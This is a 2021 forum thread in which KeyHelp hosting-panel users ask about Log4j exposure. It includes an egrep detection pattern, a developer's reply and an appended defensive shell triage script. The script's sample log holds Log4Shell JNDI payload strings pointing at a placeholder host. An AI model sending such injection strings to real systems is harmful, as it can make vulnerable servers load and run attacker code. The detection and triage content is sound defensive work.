
Log4j RCE 0-day mitigation - should keyhelp users be worried?

Posted: Sat 11. Dec 2021, 05:34
by majorboobage
I just got an email from Cloudflare, but unfortunately I couldn't find any information on whether the panel uses log4j or not. Can someone from the developers clarify? https://blog.cloudflare.com/cve-2021-44 ... itigation/

thanks!

Re: Log4j RCE 0-day mitigation - should keyhelp users be worried?

Posted: Sat 11. Dec 2021, 17:13
by nikko
I have checked on a clean system; I think it's not installed or enabled by default (liblog4j2-java).

More from the devs of KH.

Re: Log4j RCE 0-day mitigation - should keyhelp users be worried?

Posted: Sat 11. Dec 2021, 21:55
by Tobi_BB21
When I do

Code:

egrep -i -r '\$\{jndi:(ldap[s]?|rmi)://' /var/log

I am getting as a result the keys of /var/log/apache2/keyhelp/other_vhosts_access.log. Is that something to be worried about or what can be done?

Re: Log4j RCE 0-day mitigation - should keyhelp users be worried?  [SOLVED]

Posted: Mon 13. Dec 2021, 09:01
by Alexander
KeyHelp itself does not use Java and therefore does not use this lib.

There may be additional software running on your server using Java, depending on the applications you are running, but they are not related to KeyHelp.

---
Tobi_BB21 wrote: Sat 11. Dec 2021, 21:55

Code:

egrep -i -r '\$\{jndi:(ldap[s]?|rmi)://' /var/log

I am getting as a result the keys of /var/log/apache2/keyhelp/other_vhosts_access.log. Is that something to be worried about or what can be done?

These are just bots trying to see if your server is vulnerable to an attack on this library.
You should ask yourself, do you use Java on your system? - Then it can either be ignored or you have to take necessary steps.

---

KeyHelp is running apt-get update && apt-get upgrade on a regular basis (see maintenance intervals in KeyHelp). Even if you have some Java applications on your server the issue should be fixed automatically soon.
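
The triage described in the reply above, as an added example that is not part of the original posts and is not KeyHelp code: it counts the probe lines the thread's egrep pattern matches, lists the probing clients, and checks whether a log4j-core jar exists at all. The function names, the search root and the sample log lines are constructed; the client-address field assumes Apache's vhost_combined log format.

```shell
# Same pattern as the egrep command in the thread.
JNDI_RE='\$\{jndi:(ldap[s]?|rmi)://'

# Number of log lines that contain a probe string.
count_probes() { grep -Eic "$JNDI_RE" "$1" || true; }

# Probing clients as "address count" (assumption: vhost_combined format,
# field 1 = vhost:port, field 2 = client address).
probe_sources() {
    grep -Ei "$JNDI_RE" "$1" | awk '{print $2}' | sort | uniq -c |
        sort -rn | awk '{print $2 " " $1}'
}

# log4j-core jars below a directory (assumption: the jar keeps its upstream
# file name; copies bundled inside other archives are not detected).
find_log4j_core() { find "$1" -type f -name 'log4j-core*.jar' 2>/dev/null | sort; }

# Verdict: probe lines only matter if the library is actually on the system.
# usage: triage <logfile> <search-root>
triage() (
    [ -r "$1" ] || { echo "ERROR: cannot read $1"; exit 2; }
    probes=$(count_probes "$1")
    jars=$(find_log4j_core "$2")
    if [ -n "$jars" ]; then
        echo "REVIEW: log4j-core present, $probes probe line(s) logged"
    elif [ "$probes" -gt 0 ]; then
        echo "NOISE: $probes probe line(s), no log4j-core found"
    else
        echo "CLEAN: no probes, no log4j-core found"
    fi
)

# Constructed sample data (not real traffic): two probes, one normal request.
demo_dir=$(mktemp -d)
cat > "$demo_dir/other_vhosts_access.log" <<'EOF'
example.test:443 203.0.113.7 - - [11/Dec/2021:21:40:01 +0100] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://probe.invalid/a}"
example.test:443 203.0.113.7 - - [11/Dec/2021:21:40:05 +0100] "GET /?x=${jndi:rmi://probe.invalid/b} HTTP/1.1" 404 300 "-" "curl/7.74.0"
example.test:80 198.51.100.9 - - [11/Dec/2021:21:41:00 +0100] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
EOF
mkdir -p "$demo_dir/opt"

probe_sources "$demo_dir/other_vhosts_access.log"
triage "$demo_dir/other_vhosts_access.log" "$demo_dir/opt"
```

On a real server, point triage at /var/log/apache2/keyhelp/other_vhosts_access.log and at the directories where Java applications are installed.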